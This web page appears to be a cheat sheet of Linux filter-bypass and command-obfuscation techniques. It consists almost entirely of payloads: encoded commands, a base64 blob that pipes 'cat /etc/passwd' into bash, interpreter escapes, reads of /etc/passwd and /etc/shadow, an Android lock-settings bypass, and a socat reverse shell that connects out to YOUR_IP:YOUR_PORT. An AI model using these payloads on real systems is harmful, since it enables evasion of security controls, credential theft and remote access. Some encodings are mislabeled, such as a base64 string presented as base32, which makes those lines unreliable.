Skip to content

Linux Bypass Techniques: Commands to Circumvent Restrictions

Explore various Linux bypass techniques to circumvent restrictions using shell commands such as hex encoding, echoing, finding files, and more. Enhance your understanding of shell scripting with these effective methods.

Using hex encoding

$(echo -e "\x2F\x75\x73\x72\x2F\x62\x69\x6E\x2F\x77\x68\x6F\x61\x6D\x69")

Test bypass cmd locksettings Andorid

sh -c \
`\
c\
m\
d\
\ \
l\
o\
c\
k\
_\
s\
e\
t\
t\
i\
n\
g\
s\
\ \
\-\
\-\
v\
e\
r\
i\
f\
y\
\ \
1\
4\
7\
8\
9 \
`
List current files and folders 
ls *
Using echo for list all files/dirs 
echo *
Using find 
find -maxdepth 1
awk 
awk 'BEGIN {system("ls")}'
awk with ls -1 
awk 'BEGIN { cmd="ls -1"; while (cmd | getline line) print line; close(cmd) }'
printf and for-loop 
for f in *; do printf '%s\n' "$f"; done
Using find with -exec 
find . -maxdepth 1 -exec basename {} \;
Using stat 
stat -c '%n' *
Using readlink 
for f in *; do readlink -f "$f"; done
Using perl 
perl -e 'opendir(DIR, "."); @files = readdir(DIR); foreach $file (@files) { print "$file\n"; } closedir(DIR);'
Using python (inline) 
python -c 'import os; [print(f) for f in os.listdir(".")]'
Using ruby 
ruby -e 'Dir.foreach(".") {|f| puts f}'
Using tee and Process Substitution 
ls -1 | tee >(cat)
Using grep on ls output 
ls -1 | grep '.*'
Using mapfile (Bash 4+) 
mapfile -t files < <(ls -1); printf '%s\n' "${files[@]}"
Using xargs with ls 
ls -1 | xargs -I {} echo {}

Another example of hex encoding

echo -e '\x70\x69\x6E\x67'

Using ANSI C quoting

echo $'\x70\x69\x6E\x67'

Using printf

printf '\x70\x69\x6E\x67'

Using base32 encoding

# base32
$(echo "L2Jpbi9waW5nCg==" | base32 -d)

Base16 (hex) encoding

Hex encoding

$(echo 2f62696e2f77686f616d69 | xxd -r -p)

Octal encoding

$/usr/bin/who$'\157\141\155\151' #octal encoding

Using command substitution

cat <(echo /etc/passwd)

Variable assignment and indirect reference

cmd="whoami"; $cmd
b=base64; $b<<<$(echo "Y2F0IC9ldGMvcGFzc3dkCg=="| base64 -d)|bash

Using IFS (Internal Field Separator)

IFS='/'; cmd="usr bin whoami"; $cmd

Using HEREDOC

bash <<HERE
whoami
HERE

Using process substitution

bash <(echo "whoami")

Using functions

f() { whoami; }; f

Using alias

alias p='ping'; p localhost

Using brace expansion

echo /{usr,bin}/whoami

Arithmetic expansion

echo $((0x70,0x69,0x6E,0x67))

PATH modification

PATH=.:/usr/bin:/bin; whoami

Hostname lookup

ping $(host -t a "example.com" | grep "has address" | cut -d" " -f4)

DNS TXT record lookup

dig +short txt "example.com"

Using socat for reverse shell

socat exec:'bash -li',pty,stderr,setsid,sigint,sane tcp:YOUR_IP:YOUR_PORT

Using awk

awk 'BEGIN {system("whoami")}'

Using perl

perl -e 'exec "/usr/bin/whoami";'

Using python

python -c 'import os; os.system("/usr/bin/whoami")'

Using ruby

ruby -e 'exec "/usr/bin/whoami"'

Using vi/vim

vi -c ':!whoami' -c ':q!'

Using ssh

ssh user@localhost whoami

Using env command

env whoami

Using column command

column < /etc/passwd

Using awk with input redirection

awk '{print}' < /etc/passwd

Using grep with a pattern

grep '.*' /etc/passwd

Using sed

sed -n 'p' /etc/passwd

Using tac (reverse cat)

tac /etc/shadow | tac

Using tee

cat /etc/passwd | tee

Using xargs

echo /etc/passwd | xargs cat

Using more/less commands

more /etc/passwd

Using head/tail commands

head -n 5 /etc/passwd
tail -n 5 /etc/passwd

Using look

look '' /etc/passwd